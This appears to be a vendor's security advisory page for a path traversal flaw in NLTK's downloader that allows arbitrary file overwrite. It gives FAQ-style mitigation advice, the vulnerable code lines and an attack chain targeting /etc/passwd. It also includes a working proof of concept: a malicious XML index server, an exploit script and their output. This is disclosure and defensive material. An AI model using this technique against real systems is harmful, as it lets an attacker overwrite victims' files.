How severe is GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 has a CVSS score of 8.1/10, rated HIGH. No patched version is available yet, so prompt mitigation is strongly recommended.

Which packages are affected by GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 affects the following packages: nltk (PyPI). Ecosystems affected: PyPI.

How do I fix GHSA-469j-vmhf-r6v7?

No patched version of nltk has shipped for GHSA-469j-vmhf-r6v7 yet, and all versions are listed as vulnerable, so pinning to a different release does not remove the flaw. Until a fix is released, point the NLTK downloader only at index servers you trust and apply any maintainer-recommended mitigation.

How do I detect GHSA-469j-vmhf-r6v7 in my PyPI dependencies?

Scan your dependency manifests and lock files (requirements.txt, poetry.lock, Pipfile.lock, etc.) for nltk, including transitive dependencies. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
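As a quick local check alongside a scanner, the presence of nltk can be confirmed from Python itself. The following is a minimal sketch using only the standard library; the helper names `installed_nltk_version` and `requirements_mention_nltk` are hypothetical, and the check reports presence only, not whether the downloader is reachable from your code.

```python
import re
from importlib import metadata
from typing import Iterable, Optional


def installed_nltk_version() -> Optional[str]:
    """Return the installed nltk version, or None if nltk is not installed."""
    try:
        return metadata.version("nltk")
    except metadata.PackageNotFoundError:
        return None


def requirements_mention_nltk(lines: Iterable[str]) -> bool:
    """Return True if any requirements-style line names the nltk package."""
    # Match "nltk", optional extras, then an optional version specifier or marker.
    pattern = re.compile(r"^\s*nltk\s*(\[.*\])?\s*([=<>!~;@].*)?$", re.IGNORECASE)
    for line in lines:
        stripped = line.split("#", 1)[0].strip()  # drop trailing comments
        if stripped and pattern.match(stripped):
            return True
    return False
```

Passing the lines of a requirements.txt file to `requirements_mention_nltk` covers direct dependencies only; transitive dependencies still need a resolved lock file or a scanner.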

How do I mitigate GHSA-469j-vmhf-r6v7 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
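One way to validate untrusted input at the boundary is to inspect the index XML before handing its URL to the downloader. The sketch below assumes the index layout shown in this advisory's PoC (`<package>` elements carrying `id` and `subdir` attributes); `is_safe_component` and `find_unsafe_packages` are hypothetical helper names and are not part of NLTK.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple


def is_safe_component(value: str, allow_slash: bool) -> bool:
    """Reject empty values, absolute paths, backslashes, colons, and '..' segments."""
    if not value or value.startswith("/") or "\\" in value or ":" in value:
        return False
    if not allow_slash and "/" in value:
        return False
    return all(part not in ("", ".", "..") for part in value.split("/"))


def find_unsafe_packages(index_xml: str) -> List[Tuple[str, str]]:
    """Return (id, subdir) pairs from the index that look like traversal attempts."""
    # Note: ElementTree is not hardened against hostile XML; this is only a sketch.
    root = ET.fromstring(index_xml)
    unsafe = []
    for pkg in root.iter("package"):
        pkg_id = pkg.get("id", "")
        subdir = pkg.get("subdir", "")
        if not (is_safe_component(pkg_id, allow_slash=False)
                and is_safe_component(subdir, allow_slash=True)):
            unsafe.append((pkg_id, subdir))
    return unsafe
```

An empty result does not prove the index is safe; it only means no entry matched these particular checks.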

How does O3 Security protect against GHSA-469j-vmhf-r6v7?

O3 pinpoints whether GHSA-469j-vmhf-r6v7 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-469j-vmhf-r6v7 actively exploited in the wild?

No public exploit code has been indexed for GHSA-469j-vmhf-r6v7 yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 has an EPSS (Exploit Prediction Scoring System) score of 0.4%, placing it in the 31st percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 is classified as Path Traversal (CWE-22). This weakness type describes the underlying flaw category, which helps determine the potential impact and the right class of mitigation. This is a high-impact weakness class that often enables remote code execution or data exposure.

When was GHSA-469j-vmhf-r6v7 published, and has it been updated?

GHSA-469j-vmhf-r6v7 was published on March 19, 2026 and was last updated on March 25, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐍 PyPI

GHSA-469j-vmhf-r6v7

HIGH

NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite

Also known as CVE-2026-33236

Published

Mar 19, 2026

Updated

Mar 25, 2026

Affected

1 pkg

Patched

None yet

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.4% probability of exploitation in next 30 days

Lower Risk · 31st percentile · +0.37%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐍nltk


Description

Vulnerability Description

The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. An attacker who controls a remote XML index server can supply malicious values containing path traversal sequences (such as ../), which can lead to:

Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
Arbitrary File Creation: Create arbitrary files
Arbitrary File Overwrite: Overwrite critical system files (such as /etc/passwd or ~/.ssh/authorized_keys)

Vulnerability Principle

Key Code Locations

1. XML Parsing Without Validation (nltk/downloader.py:253)

self.filename = os.path.join(subdir, id + ext)

subdir and id are taken directly from XML attributes without any validation

2. Path Construction Without Checks (nltk/downloader.py:679)

filepath = os.path.join(download_dir, info.filename)

Uses info.filename directly, which may contain path traversal sequences

3. Unrestricted Directory Creation (nltk/downloader.py:687)

os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)

Can create arbitrary directories outside the download directory

4. File Writing Without Protection (nltk/downloader.py:695)

with open(filepath, "wb") as outfile:

Can write to arbitrary locations in the file system
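The four locations above share one gap: nothing confirms that the joined path stays inside the download directory. A common guard, sketched here as an assumption about what a check could look like (it is not the maintainers' patch), resolves the candidate path and compares it with the resolved base directory. `safe_join` is a hypothetical helper name.

```python
import os


def safe_join(base_dir: str, *parts: str) -> str:
    """Join parts onto base_dir, raising ValueError if the result escapes it."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *parts))
    # commonpath equals base only when candidate is base itself or lies beneath it.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes {base_dir!r}: {candidate!r}")
    return candidate
```

Because `os.path.realpath` also resolves symbolic links, the check applies to the location that would actually be written rather than to the literal string.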

Attack Chain

1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. System file is overwritten!
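Steps 4 to 7 can be followed without touching the network or the file system by computing the paths alone. The sketch below mirrors the two `os.path.join` calls quoted from nltk/downloader.py; the `download_dir` value is an illustrative assumption, and `posixpath` is used so the result is the same on any platform.

```python
import posixpath

download_dir = "/srv/nltk_data"                       # illustrative download directory
subdir, pkg_id, ext = "../../etc", "passwd", ".zip"   # values from the malicious XML

filename = posixpath.join(subdir, pkg_id + ext)       # as in Package.fromxml()
filepath = posixpath.join(download_dir, filename)     # as in _download_package()
resolved = posixpath.normpath(filepath)               # location the write would land in

print(filename)
print(filepath)
print(resolved)
```

How many `../` segments are needed depends on the depth of the download directory, which is why the PoC uses a long run of them to reach the file system root.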

Impact Scope

System File Overwrite

Reproduction Steps

Environment Setup

Install NLTK

pip install nltk

Prepare malicious server and exploit script (see PoC section)

Reproduction Process

Step 1: Start malicious server

python3 malicious_server.py

Step 2: Run exploit script

python3 exploit_vulnerability.py

Step 3: Verify results

ls -la /tmp/test_file.zip

Proof of Concept

Malicious Server (malicious_server.py)

#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file" subdir="../../../../../../../../../tmp" 
             url="http://127.0.0.1:8888/test.zip" 
             size="100" unzipped_size="100" unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")

# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()
    
    def log_message(self, format, *args):
        pass

# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")

Exploit Script (exploit_vulnerability.py)

#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile

def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")
    
    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)
    
    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print("✗ Path traversal attack successful!")
    else:
        print("\n? File not found, download may have failed")

if __name__ == "__main__":
    exploit()

Execution Results

✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!

Affected Packages

1 total

Ecosystem	Package	Vulnerable range	Fix
🐍PyPI	`nltk`	all versions	No fix


